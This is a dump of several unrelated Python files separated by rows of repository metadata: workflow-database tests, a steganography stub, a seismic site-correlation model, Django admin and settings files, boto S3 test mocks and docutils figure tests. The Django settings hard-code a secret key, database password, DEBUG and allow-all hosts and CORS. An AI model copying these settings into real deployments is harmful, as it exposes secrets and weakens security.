(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 0
assert jd == 2
assert jl == 9
assert er == 120
assert ew == 50
(id, jr, jd) = self.interface.db.execute(
"select id, units_running, units_done from files_test_ugly where filename='/test/0.root'").fetchone()
assert jr == 0
assert jd == 2
(id, jr, jd) = self.interface.db.execute(
"select id, units_running, units_done from files_test_ugly where filename='/test/1.root'").fetchone()
assert jr == 0
assert jd == 0
# }}}
def test_return_uglier(self):
# {{{
self.interface.register_dataset(
*self.create_dbs_dataset(
'test_uglier', lumis=15, filesize=3, tasksize=8))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_uglier', 1)[0]
task_update = TaskUpdate(host='hostname', id=id, submissions=1)
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
False,
task_update,
{
'/test/0.root': (300, [(1, 1), (1, 2), (1, 3)]),
'/test/1.root': (300, [(1, 4), (1, 5), (1, 6)]),
},
['/test/2.root'],
100
)
self.interface.update_units({(label, "units_" + label): [(task_update, file_update, unit_update)]})
# grab another task
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_uglier', 1)[0]
task_update.id = id
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
False,
task_update,
{
'/test/2.root': (300, [(1, 7), (1, 8), (1, 9)]),
'/test/3.root': (300, [(1, 10), (1, 11), (1, 12)]),
'/test/4.root': (100, [(1, 13)]),
},
[],
100
)
self.interface.update_units({(label, "units_" + label): [(task_update, file_update, unit_update)]})
(jr, jd, jl, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
units_left,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 0
assert jd == 13
assert jl == 2
assert er == 1300
assert ew == 200
# }}}
def test_file_obtain(self):
# {{{
self.interface.register_dataset(
*self.create_file_dataset(
'test_file_obtain', 5, 3))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_file_obtain', 1)[0]
parameters = {'mask': {'lumis': None}}
TaskHandler(id, label, files, lumis, None, True).adjust(
parameters, [], [], se.StorageConfiguration({}))
assert parameters['mask']['lumis'] is None
(jr, jd, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 3
assert jd == 0
assert er in (0, None)
assert ew in (0, None)
# }}}
def test_file_return_good(self):
# {{{
self.interface.register_dataset(
*self.create_file_dataset(
'test_file_return_good', 5, 3))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_file_return_good', 1)[0]
task_update = TaskUpdate(host='hostname', id=id)
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
False,
task_update,
{
'/test/0.root': (220, [(1, 1), (1, 2), (1, 3)]),
'/test/1.root': (220, [(1, 3), (1, 4), (1, 5)]),
'/test/2.root': (160, [(1, 5), (1, 6)])
},
[],
100
)
self.interface.update_units(
{(label, "units_" + label): [(task_update, file_update, unit_update)]})
(jr, jd, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 0
assert jd == 3
assert er == 600
assert ew == 100
# }}}
def test_file_return_bad(self):
# {{{
self.interface.register_dataset(
*self.create_file_dataset(
'test_file_return_bad', 5, 3))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_file_return_bad', 1)[0]
task_update = TaskUpdate(exit_code=1234, host='hostname', id=id)
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
True,
task_update,
{},
[],
0
)
self.interface.update_units(
{(label, "units_" + label): [(task_update, file_update, unit_update)]})
(jr, jd, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 0
assert jd == 0
assert er in (0, None)
assert ew in (0, None)
# }}}
def test_file_return_ugly(self):
# {{{
self.interface.register_dataset(
*self.create_file_dataset(
'test_file_return_ugly', 5, 3))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_file_return_ugly', 1)[0]
task_update = TaskUpdate(host='hostname', id=id)
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
False,
task_update,
{
'/test/0.root': (220, [(1, 1), (1, 2), (1, 3)]),
'/test/1.root': (220, [(1, 3), (1, 4), (1, 5)]),
},
['/test/2.root'],
100
)
self.interface.update_units(
{(label, "units_" + label): [(task_update, file_update, unit_update)]})
(jr, jd, jl, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
units_left,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 0
assert jd == 2
assert jl == 3
assert er == 440
assert ew == 100
# }}}
class TestCMSSWProvider(object):
@classmethod
def setup_class(cls):
cls.workdir = tempfile.mkdtemp()
cls.provider = cmssw.taskProvider({
'workdir': cls.workdir,
'stageout location': cls.workdir,
'id': 'test',
'recycle sandbox': '/dev/null',
'tasks': {}
})
cls.provider._taskProvider__store = DummyInterface()
shutil.copytree(
os.path.join(os.path.dirname(__file__), 'tmp_data'),
os.path.join(cls.workdir, 'tmp_data'))
@classmethod
def teardown_class(cls):
shutil.rmtree(cls.workdir)
# def test_return_good(self):
# self.provider._taskProvider__taskdirs[0] = \
# os.path.join(self.workdir, 'tmp_data', 'running', '0')
# self.provider._taskProvider__taskworkflows[0] = 'test'
# self.provider._taskProvider__taskoutputs[0] = []
# self.provider
# def test_return_bad(self):
# assert 2 == 2
# def test_return_ugly(self):
# assert 1 == 1
| 35.004342 | 132 | 0.525384 | 2,818 | 24,188 | 4.347764 | 0.074876 | 0.063663 | 0.024486 | 0.034688 | 0.742899 | 0.718087 | 0.703232 | 0.690581 | 0.677196 | 0.665606 | 0 | 0.035721 | 0.346081 | 24,188 | 690 | 133 | 35.055072 | 0.738889 | 0.020713 | 0 | 0.585742 | 0 | 0.042389 | 0.252591 | 0.013112 | 0 | 0 | 0 | 0.001449 | 0.159923 | 1 | 0.044316 | false | 0.001927 | 0.017341 | 0 | 0.073218 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d9fadb27f33154f260c16772184c626a80c97c78 | 1,141 | py | Python | src/SBS/imagemessage.py | Joao-vap/Voyager-based-Steganography | 9835e89cf8f1d472d7b3c8a8ead73a0ee553645c | [
"MIT"
] | null | null | null | src/SBS/imagemessage.py | Joao-vap/Voyager-based-Steganography | 9835e89cf8f1d472d7b3c8a8ead73a0ee553645c | [
"MIT"
] | null | null | null | src/SBS/imagemessage.py | Joao-vap/Voyager-based-Steganography | 9835e89cf8f1d472d7b3c8a8ead73a0ee553645c | [
"MIT"
] | null | null | null | import os
import numpy as np
import pydub as pd
from src.SBS.messenger import Messenger as messenger
from abc import ABC, abstractmethod
class ImageMessage(messenger, ABC):
""" Abstract methods """
def __init__(self, images_path=None):
super().__init__(images_path)
@abstractmethod
def __add__(self, other):
""" Add two messages
Args:
other (ImageMessage): message to be added
"""
pass
@abstractmethod
def __repr__(self):
""" Return string representation of message
"""
pass
def _getMessageFromFile(self, file) -> np.ndarray:
""" Return message from mp3 file
Args:
file (str): path of mp3 file
Returns:
np.ndarray: message from mp3 file
"""
# get message from mp3 file
# mp3 = pd.AudioSegment.from_mp3(f"{file}")
# left, right = mp3.split_to_mono()[0], mp3.split_to_mono()[1]
left = np.array([])
right = np.array([])
return np.array(left.get_array_of_samples()), np.array(right.get_array_of_samples())
| 24.804348 | 92 | 0.59071 | 135 | 1,141 | 4.77037 | 0.414815 | 0.043478 | 0.065217 | 0.083851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012626 | 0.305872 | 1,141 | 45 | 93 | 25.355556 | 0.800505 | 0.33567 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0.111111 | 0.277778 | 0 | 0.611111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8a167b81ced1b1d14b37a9c5bab2affdcc2a1c5b | 2,603 | py | Python | calculation/sha_calc/sha_calc/spatial_hazard/loth_baker_model.py | ucgmsim/gmhazard | d3d90b4c94b3d9605597a3efeccc8523a1e50c0e | [
"MIT"
] | null | null | null | calculation/sha_calc/sha_calc/spatial_hazard/loth_baker_model.py | ucgmsim/gmhazard | d3d90b4c94b3d9605597a3efeccc8523a1e50c0e | [
"MIT"
] | 8 | 2021-10-13T02:33:23.000Z | 2022-03-29T21:01:08.000Z | calculation/sha_calc/sha_calc/spatial_hazard/loth_baker_model.py | ucgmsim/gmhazard | d3d90b4c94b3d9605597a3efeccc8523a1e50c0e | [
"MIT"
] | null | null | null | """Implementation of the Loth & Baker (2013) site correlation model"""
import numpy as np
valid_periods = np.array([0.01, 0.1, 0.2, 0.5, 1.0, 2.0, 5.0, 7.5, 10.0])
short_range_corregionalization = np.array(
[
[0.30, 0.24, 0.23, 0.22, 0.16, 0.07, 0.03, 0.00, 0.00],
[0.24, 0.27, 0.19, 0.13, 0.08, 0.00, 0.00, 0.00, 0.00],
[0.23, 0.19, 0.26, 0.19, 0.12, 0.04, 0.00, 0.00, 0.00],
[0.22, 0.13, 0.19, 0.32, 0.22, 0.13, 0.09, 0.06, 0.04],
[0.16, 0.08, 0.12, 0.23, 0.32, 0.22, 0.13, 0.09, 0.07],
[0.07, 0.00, 0.04, 0.14, 0.22, 0.33, 0.23, 0.19, 0.16],
[0.03, 0.00, 0.00, 0.09, 0.13, 0.23, 0.34, 0.29, 0.24],
[0.00, 0.00, 0.00, 0.06, 0.09, 0.19, 0.29, 0.30, 0.25],
[0.00, 0.00, 0.00, 0.04, 0.07, 0.16, 0.24, 0.25, 0.24],
]
)
long_range_corregionalization = np.array(
[
[0.31, 0.26, 0.27, 0.24, 0.17, 0.11, 0.08, 0.06, 0.05],
[0.26, 0.29, 0.22, 0.15, 0.07, 0.00, 0.00, 0.00, -0.03],
[0.27, 0.22, 0.29, 0.24, 0.15, 0.09, 0.03, 0.02, 0.00],
[0.24, 0.15, 0.24, 0.33, 0.27, 0.23, 0.17, 0.14, 0.14],
[0.17, 0.07, 0.15, 0.27, 0.38, 0.34, 0.23, 0.19, 0.21],
[0.11, 0.00, 0.09, 0.23, 0.34, 0.44, 0.33, 0.29, 0.32],
[0.08, 0.00, 0.03, 0.17, 0.23, 0.33, 0.45, 0.42, 0.42],
[0.06, 0.00, 0.02, 0.14, 0.19, 0.29, 0.42, 0.47, 0.47],
[0.05, -0.03, 0.00, 0.14, 0.21, 0.32, 0.42, 0.47, 0.54],
]
)
nugget_corregionalization = np.array(
[
[0.38, 0.36, 0.35, 0.17, 0.04, 0.04, 0.00, 0.03, 0.08],
[0.36, 0.43, 0.35, 0.13, 0.00, 0.02, 0.00, 0.02, 0.08],
[0.35, 0.35, 0.45, 0.11, -0.04, -0.02, -0.04, -0.02, 0.03],
[0.17, 0.13, 0.11, 0.35, 0.20, 0.06, 0.02, 0.04, 0.02],
[0.04, 0.00, -0.04, 0.20, 0.30, 0.14, 0.09, 0.12, 0.04],
[0.04, 0.02, -0.02, 0.06, 0.14, 0.22, 0.12, 0.13, 0.09],
[0.00, 0.00, -0.04, 0.02, 0.09, 0.12, 0.21, 0.17, 0.23],
[0.03, 0.02, -0.02, 0.04, 0.12, 0.13, 0.17, 0.23, 0.10],
[0.08, 0.08, 0.03, 0.02, 0.04, 0.09, 0.13, 0.10, 0.22],
]
)
def get_correlations(im_1: str, im_2: str, site_dist: np.ndarray):
T_1 = float(im_1.split("_")[1])
T_2 = float(im_2.split("_")[1])
idx_1 = np.argmin(T_1 >= valid_periods)
idx_2 = np.argmin(T_2 >= valid_periods)
cov = short_range_corregionalization[idx_1, idx_2] * np.exp(
-3.0 * site_dist / 20.0
) + long_range_corregionalization[idx_1, idx_2] * np.exp(-3.0 * site_dist / 70.0)
self_mask = np.isclose(site_dist, 0.0)
cov[self_mask] += nugget_corregionalization[idx_1, idx_2]
return cov
| 43.383333 | 85 | 0.496735 | 628 | 2,603 | 1.998408 | 0.140127 | 0.076494 | 0.101992 | 0.066932 | 0.501195 | 0.183267 | 0.183267 | 0.094024 | 0.094024 | 0.073307 | 0 | 0.396858 | 0.242028 | 2,603 | 59 | 86 | 44.118644 | 0.23923 | 0.024587 | 0 | 0 | 0 | 0 | 0.00079 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019231 | false | 0 | 0.019231 | 0 | 0.057692 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8a24e504a3a00677cf33c6f846b049690d427b22 | 1,314 | py | Python | eveuniverse/admin.py | buahaha/django-eveuniverse | 4dd875238d475c5dd0355283b6257e3bcbad2d8b | [
"MIT"
] | null | null | null | eveuniverse/admin.py | buahaha/django-eveuniverse | 4dd875238d475c5dd0355283b6257e3bcbad2d8b | [
"MIT"
] | null | null | null | eveuniverse/admin.py | buahaha/django-eveuniverse | 4dd875238d475c5dd0355283b6257e3bcbad2d8b | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import (
EveCategory,
EveConstellation,
EveGroup,
EveMoon,
EvePlanet,
EveRegion,
EveSolarSystem,
EveType,
)
class EveUniverseEntityModelAdmin(admin.ModelAdmin):
def has_module_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
def has_change_permission(self, request, obj=None):
return False
def has_add_permission(self, request):
return False
ordering = ["name"]
search_fields = ["name"]
@admin.register(EveCategory)
class EveCategoryAdmin(EveUniverseEntityModelAdmin):
pass
@admin.register(EveConstellation)
class EveConstellationAdmin(EveUniverseEntityModelAdmin):
pass
@admin.register(EveGroup)
class EveGroupAdmin(EveUniverseEntityModelAdmin):
pass
@admin.register(EveMoon)
class EveMoonAdmin(EveUniverseEntityModelAdmin):
pass
@admin.register(EveRegion)
class EveRegionAdmin(EveUniverseEntityModelAdmin):
pass
@admin.register(EvePlanet)
class EvePlanetAdmin(EveUniverseEntityModelAdmin):
pass
@admin.register(EveSolarSystem)
class EveSolarSystemAdmin(EveUniverseEntityModelAdmin):
pass
@admin.register(EveType)
class EveTypeAdmin(EveUniverseEntityModelAdmin):
pass
| 18.771429 | 57 | 0.753425 | 117 | 1,314 | 8.384615 | 0.376068 | 0.106014 | 0.256881 | 0.313965 | 0.156983 | 0.091743 | 0.091743 | 0.091743 | 0.091743 | 0 | 0 | 0 | 0.16895 | 1,314 | 69 | 58 | 19.043478 | 0.898352 | 0 | 0 | 0.26087 | 0 | 0 | 0.006088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.173913 | 0.043478 | 0.086957 | 0.456522 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
8a2e1bd2e12ee8294ca2a44fdacd57e8e6d133f3 | 4,101 | py | Python | tests/settings.py | Ming-Lyu/chatter | 58301d30cc0cdc3d601de0673b976c89ab1f2dcb | [
"MIT"
] | 4 | 2020-10-01T15:46:45.000Z | 2021-05-01T21:11:46.000Z | tests/settings.py | Ming-Lyu/chatter | 58301d30cc0cdc3d601de0673b976c89ab1f2dcb | [
"MIT"
] | null | null | null | tests/settings.py | Ming-Lyu/chatter | 58301d30cc0cdc3d601de0673b976c89ab1f2dcb | [
"MIT"
] | null | null | null | """
Django settings for example project.
Generated by Cookiecutter Django Package
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "ej)!^jzmrti5#%8g6&eznj&^p!v-nb%pi+06kw=hejkx$r&8h7"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.forms',
'rest_framework',
'corsheaders',
'chatter',
'chatter.test_utils.test_app',
'channels',
# if your app has other dependencies that need to be added to the site
# they should be added here
]
ASGI_APPLICATION = 'tests.routing.application'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tests.urls'
FORM_RENDERER = 'django.forms.renderers.TemplatesSetting'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'chatter/templates/chatter'), ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# WSGI_APPLICATION = 'wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
# settings.py
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'postgres',
'USER': 'postgres',
'PASSWORD': 'postgres',
'HOST': 'db',
'PORT': 5432,
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'chatter/static')
# CKEDITOR_BASEPATH = "/static/ckeditor/ckeditor/"
import platform
# This requires that redis server is running on local/virtual machine
CHANNEL_LAYERS = {
'default': {
'BACKEND': 'channels_redis.core.RedisChannelLayer',
'CONFIG': {
# "hosts": [('192.168.99.100', 6379) if platform.system()=='Windows' else ('127.0.0.1', 6379)],
"hosts": [('redis', 6379),], # docker
},
},
}
OFFICIAL_USER = 'official_user'
CORS_ALLOW_ALL_ORIGINS=True | 26.803922 | 107 | 0.670812 | 443 | 4,101 | 6.106095 | 0.469526 | 0.072089 | 0.043993 | 0.046211 | 0.193346 | 0.168946 | 0.065434 | 0.054713 | 0.029575 | 0 | 0 | 0.017391 | 0.186784 | 4,101 | 153 | 108 | 26.803922 | 0.793703 | 0.309924 | 0 | 0.022472 | 1 | 0.011236 | 0.533286 | 0.426628 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.067416 | 0.022472 | 0 | 0.022472 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
8a340b1369ee697a24cdef989a379fd6665fcd62 | 183 | py | Python | src/rpc/exceptions/interface_not_listening.py | simondotsh/SidResolver | 4435970199fcb9aeeab836393782f9924a4a6872 | [
"MIT"
] | 2 | 2021-11-25T14:15:12.000Z | 2022-02-02T04:27:17.000Z | src/rpc/exceptions/interface_not_listening.py | simondotsh/SidResolver | 4435970199fcb9aeeab836393782f9924a4a6872 | [
"MIT"
] | null | null | null | src/rpc/exceptions/interface_not_listening.py | simondotsh/SidResolver | 4435970199fcb9aeeab836393782f9924a4a6872 | [
"MIT"
] | 2 | 2021-11-03T18:11:40.000Z | 2022-02-02T15:11:30.000Z | class InterfaceNotListening(Exception):
def __init__(self, error):
message = f'RPC error (interface most-likely not listening): {error}.'
super().__init__(message) | 45.75 | 78 | 0.693989 | 20 | 183 | 5.95 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185792 | 183 | 4 | 79 | 45.75 | 0.798658 | 0 | 0 | 0 | 0 | 0 | 0.309783 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8a429e4cfce478c634adfa500b30a1fe2f5a9c22 | 1,155 | py | Python | app/tests/configs/conftest_aws.py | GeorgianBadita/remote-code-execution-engine | 4ac3ca7567cd89cc1f979622add81efa9edfea8f | [
"MIT"
] | null | null | null | app/tests/configs/conftest_aws.py | GeorgianBadita/remote-code-execution-engine | 4ac3ca7567cd89cc1f979622add81efa9edfea8f | [
"MIT"
] | null | null | null | app/tests/configs/conftest_aws.py | GeorgianBadita/remote-code-execution-engine | 4ac3ca7567cd89cc1f979622add81efa9edfea8f | [
"MIT"
] | null | null | null | import pytest
import botocore
class Readable:
"""
Class for mocking a readable object
"""
def read(self):
"""
Class for mocking read call
"""
return "print('Hello World')".encode()
class BotoMockReturns:
def get_object(self, Bucket='', Key=''):
return {
"Body": Readable()
}
class BotoMockRaise:
def get_object(self, Bucket='', Key=''):
raise botocore.exceptions.ClientError({}, {})
@pytest.fixture
def mock_s3_boto_returns() -> callable:
"""
Fixture which returns a mock for s3 client
when the file gathering works properly
@return object mocking the s3 boto client method
"""
def client(aws_res, aws_access_key_id=None, aws_secret_access_key=None):
return BotoMockReturns()
return client
@pytest.fixture
def mock_s3_boto_raise() -> callable:
"""
Fixture which returns a mock for s3 client when invalid path is given
@return object mocking s3 boto client method
"""
def client(aws_res, aws_access_key_id=None, aws_secret_access_key=None):
return BotoMockRaise()
return client
| 20.263158 | 76 | 0.647619 | 142 | 1,155 | 5.112676 | 0.366197 | 0.033058 | 0.041322 | 0.044077 | 0.487603 | 0.487603 | 0.347107 | 0.347107 | 0.347107 | 0.347107 | 0 | 0.006985 | 0.256277 | 1,155 | 56 | 77 | 20.625 | 0.838184 | 0.269264 | 0 | 0.347826 | 0 | 0 | 0.031455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.304348 | false | 0 | 0.086957 | 0.130435 | 0.782609 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
8a4c7b93c5d706a3a3a1bb718f66bf966b221930 | 5,192 | py | Python | tests/test_figures.py | brabect1/docutils-rstwriter-dev | b74e5d5d32f697d22ab0c38bd16fa87ed7dc1ded | [
"Apache-2.0"
] | null | null | null | tests/test_figures.py | brabect1/docutils-rstwriter-dev | b74e5d5d32f697d22ab0c38bd16fa87ed7dc1ded | [
"Apache-2.0"
] | null | null | null | tests/test_figures.py | brabect1/docutils-rstwriter-dev | b74e5d5d32f697d22ab0c38bd16fa87ed7dc1ded | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Tomas Brabec
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import RstWriterTestUtils
import docutils
import docutils.core
def suite():
s = RstWriterTestUtils.PublishTestSuite(writer_name='docutils-rstwriter')
s.generateTests(totest)
return s
totest = {}
totest['figures'] = [
["""\
.. figure:: picture.png
""",
"""\
.. figure:: picture.png
"""],
["""\
.. figure:: picture.png
A picture with a caption.
""",
"""\
.. figure:: picture.png
A picture with a caption.
"""],
["""\
.. figure:: picture.png
- A picture with an invalid caption.
""",
"""\
.. figure:: picture.png
"""],
["""\
.. figure:: picture.png
Figure caption.
Figure legend.
""",
"""\
.. figure:: picture.png
Figure caption.
Figure legend.
"""],
["""\
.. figure:: picture.png
..
A picture with a legend but no caption.
""",
"""\
.. figure:: picture.png
..
A picture with a legend but no caption.
"""],
["""\
.. Figure:: picture.png
:height: 100
:width: 200
:scale: 50
A picture with image options and a caption.
""",
"""\
.. figure:: picture.png
:width: 200
:height: 100
:scale: 50
A picture with image options and a caption.
"""],
["""\
.. Figure:: picture.png
:height: 100
:alt: alternate text
:width: 200
:scale: 50
:figwidth: 300
:figclass: class1 class2
:name: fig:pix
A picture with image options on individual lines, and this caption.
""",
"""\
.. figure:: picture.png
:name: fig:pix
:width: 200
:height: 100
:scale: 50
:alt: alternate text
:figclass: class1 class2
:figwidth: 300px
A picture with image options on individual lines, and this caption.
"""],
["""\
.. figure:: picture.png
:align: center
A figure with explicit alignment.
""",
"""\
.. figure:: picture.png
:align: center
A figure with explicit alignment.
"""],
["""\
.. figure:: picture.png
:align: top
A figure with wrong alignment.
""",
"""\
"""],
["""\
This figure lacks a caption. It may still have a
"Figure 1."-style caption appended in the output.
.. figure:: picture.png
""",
"""\
This figure lacks a caption. It may still have a
"Figure 1."-style caption appended in the output.
.. figure:: picture.png
"""],
["""\
.. figure:: picture.png
A picture with a caption and a legend.
+-----------------------+-----------------------+
| Symbol | Meaning |
+=======================+=======================+
| .. image:: tent.png | Campground |
+-----------------------+-----------------------+
| .. image:: waves.png | Lake |
+-----------------------+-----------------------+
| .. image:: peak.png | Mountain |
+-----------------------+-----------------------+
""",
"""\
.. figure:: picture.png
A picture with a caption and a legend.
+-----------------------+-----------------------+
| Symbol | Meaning |
+=======================+=======================+
| .. image:: tent.png | Campground |
+-----------------------+-----------------------+
| .. image:: waves.png | Lake |
+-----------------------+-----------------------+
| .. image:: peak.png | Mountain |
+-----------------------+-----------------------+
"""],
["""\
.. figure:: picture.png
..
A picture with a legend but no caption.
(The empty comment replaces the caption, which must
be a single paragraph.)
""",
"""\
.. figure:: picture.png
..
A picture with a legend but no caption.
(The empty comment replaces the caption, which must
be a single paragraph.)
"""],
["""\
Testing for line-leaks:
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
.. figure:: picture.png
.. figure:: picture.png
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
""",
"""\
Testing for line-leaks:
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
.. figure:: picture.png
.. figure:: picture.png
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
.. figure:: picture.png
A picture with a caption.
.. figure:: picture.png
"""],
]
def load_tests(loader, tests, pattern):
return suite()
if __name__ == '__main__':
import unittest
unittest.main(defaultTest='suite')
